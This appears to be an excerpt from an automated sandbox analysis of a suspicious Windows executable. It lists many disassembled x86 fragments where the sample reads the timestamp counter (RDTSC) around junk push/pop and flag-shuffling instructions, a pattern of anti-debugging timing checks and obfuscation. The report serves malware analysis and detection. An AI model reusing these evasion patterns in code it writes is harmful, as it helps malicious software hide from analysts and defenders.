                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0417 second address: 56F046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F65CC527C9Dh 0x00000011 sbb ah, FFFFFFF6h 0x00000014 jmp 00007F65CC527CA1h 0x00000019 popfd 0x0000001a mov di, cx 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F65CC527CA8h 0x00000027 push eax 0x00000028 push edx 0x00000029 mov esi, 72CEBAC7h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0486 second address: 56F048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F048A second address: 56F0499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0499 second address: 56F04EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F65CD2EDEF9h 0x00000015 or ecx, 2B818026h 0x0000001b jmp 00007F65CD2EDEF1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207BB second address: 57207CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207CA second address: 57207ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207ED second address: 5720863 instructions: 0x00000000 rdtsc 0x00000002 mov ah, D1h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F65CC527CA5h 0x0000000c sbb ecx, 0EA81856h 0x00000012 jmp 00007F65CC527CA1h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F65CC527CA1h 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 jmp 00007F65CC527C9Ch 0x00000026 mov ax, 9CC1h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F65CC527CA6h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720863 second address: 5720872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720872 second address: 572088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572088A second address: 57208B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65CD2EDEF0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208B0 second address: 57208B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208B4 second address: 57208BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208BA second address: 5720910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F65CC527CA8h 0x0000000b sub al, 00000028h 0x0000000e jmp 00007F65CC527C9Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F65CC527CA9h 0x0000001d xchg eax, ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov esi, edi 0x00000023 mov ebx, 0C98ED2Ah 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720910 second address: 5720916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720916 second address: 5720944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F65CC527CA0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movzx ecx, di 0x00000018 mov edx, 0F41345Ch 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720944 second address: 572094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572094A second address: 572094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572094E second address: 572095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572095D second address: 5720961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720961 second address: 5720967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720967 second address: 572096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572096D second address: 5720971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720971 second address: 5720975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720975 second address: 57209AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007F65CD2EDEF2h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CD2EDEF7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209AC second address: 57209B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209B2 second address: 57209B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209B6 second address: 5720A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F65CC527C9Fh 0x00000013 sub esi, 1BDFF7FEh 0x00000019 jmp 00007F65CC527CA9h 0x0000001e popfd 0x0000001f mov ch, 94h 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F65CC527CA6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720A15 second address: 5720A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AA5 second address: 5720AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, B3BCh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AAE second address: 5720AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F65CD2EDEEEh 0x0000000b sbb eax, 1B46F2D8h 0x00000011 jmp 00007F65CD2EDEEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F65CD2EDF27h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F65CD2EDEF5h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AF4 second address: 5720AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AFA second address: 5720AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AFE second address: 5720B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B34 second address: 5720B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B3A second address: 5720B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, si 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B53 second address: 5720B88 instructions: 0x00000000 rdtsc 0x00000002 call 00007F65CD2EDEF8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, dx 0x0000000d popad 0x0000000e leave 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CD2EDEEFh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B88 second address: 5720BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720BA5 second address: 5710008 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d cmp eax, 00000000h 0x00000010 setne al 0x00000013 jmp 00007F65CD2EDEE2h 0x00000015 xor ebx, ebx 0x00000017 test al, 01h 0x00000019 jne 00007F65CD2EDEE7h 0x0000001b sub esp, 04h 0x0000001e mov dword ptr [esp], 0000000Dh 0x00000025 call 00007F65D1A5B4DBh 0x0000002a mov edi, edi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710008 second address: 571000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571000C second address: 5710012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710012 second address: 5710022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710022 second address: 571006E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F65CD2EDEF6h 0x00000011 push eax 0x00000012 jmp 00007F65CD2EDEEBh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65CD2EDEF5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571006E second address: 571009B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65CC527CA7h 0x00000008 pop ecx 0x00000009 movsx ebx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dx, 7C10h 0x00000018 mov bh, 49h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571009B second address: 57100B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d mov esi, 79AE513Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 mov cl, 2Bh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571019B second address: 571021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edi 0x0000000d pushfd 0x0000000e jmp 00007F65CC527CA8h 0x00000013 adc cx, 5358h 0x00000018 jmp 00007F65CC527C9Bh 0x0000001d popfd 0x0000001e pop ecx 0x0000001f pushfd 0x00000020 jmp 00007F65CC527CA9h 0x00000025 sbb ah, FFFFFFF6h 0x00000028 jmp 00007F65CC527CA1h 0x0000002d popfd 0x0000002e popad 0x0000002f sub edi, edi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571021F second address: 5710223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710223 second address: 571023B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571023B second address: 571025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov cx, 86B7h 0x00000012 popad 0x00000013 test al, al 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571025C second address: 5710262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102D0 second address: 57102D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102D4 second address: 57102E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57102E8 second address: 5710352 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F65CD2EDEF4h 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F65CD2EDEEDh 0x0000001b and al, 00000046h 0x0000001e jmp 00007F65CD2EDEF1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F65CD2EDEF0h 0x0000002a sub si, 77E8h 0x0000002f jmp 00007F65CD2EDEEBh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571038E second address: 5710392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710392 second address: 5710396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710396 second address: 571039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571039C second address: 57103AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57103AE second address: 57103EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F65CC527CA7h 0x0000000f jg 00007F663C8B5D53h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F65CC527CA5h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57103EC second address: 571044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65CD2EDEF7h 0x00000008 mov ax, BA4Fh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007F65CD2EDF76h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edi, 42157212h 0x0000001d pushfd 0x0000001e jmp 00007F65CD2EDEF3h 0x00000023 sbb si, 1A0Eh 0x00000028 jmp 00007F65CD2EDEF9h 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571044F second address: 571046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571046D second address: 5710471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710471 second address: 5710477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710477 second address: 57104BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F663D67BEF4h 0x0000000f jmp 00007F65CD2EDEF0h 0x00000014 mov ebx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 mov bx, B830h 0x0000001c popad 0x0000001d lea eax, dword ptr [ebp-2Ch] 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007F65CD2EDEEBh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104BE second address: 57104DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 jmp 00007F65CC527CA0h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104DC second address: 57104E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104E0 second address: 57104E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104E4 second address: 57104EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57104EA second address: 5710500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710500 second address: 5710542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F65CD2EDEF6h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65CD2EDEF7h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710542 second address: 5710549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710549 second address: 57105AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov dh, ah 0x0000000b pushfd 0x0000000c jmp 00007F65CD2EDEF3h 0x00000011 and ch, 0000000Eh 0x00000014 jmp 00007F65CD2EDEF9h 0x00000019 popfd 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F65CD2EDEEEh 0x00000021 xchg eax, ebx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F65CD2EDEF7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57105AF second address: 57105C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57105C7 second address: 57105F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F65CD2EDEEFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710617 second address: 571061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571061B second address: 571061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 571061F second address: 5710625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710625 second address: 5710682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F65CD2EDEF0h 0x0000000b or si, A038h 0x00000010 jmp 00007F65CD2EDEEBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, eax 0x0000001b jmp 00007F65CD2EDEF6h 0x00000020 test esi, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F65CD2EDEF7h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5710682 second address: 571069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 571069A second address: 5700707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F663D67BE99h 0x0000000e xor eax, eax 0x00000010 jmp 00007F65CD2C761Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d xor ebx, ebx 0x0000001f cmp eax, 00000000h 0x00000022 je 00007F65CD2EE043h 0x00000028 call 00007F65D1A4BA6Ch 0x0000002d mov edi, edi 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\0WO49yZcDA.exe | RDTSC instruction interceptor: First address: 5700707 second address: 570070B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
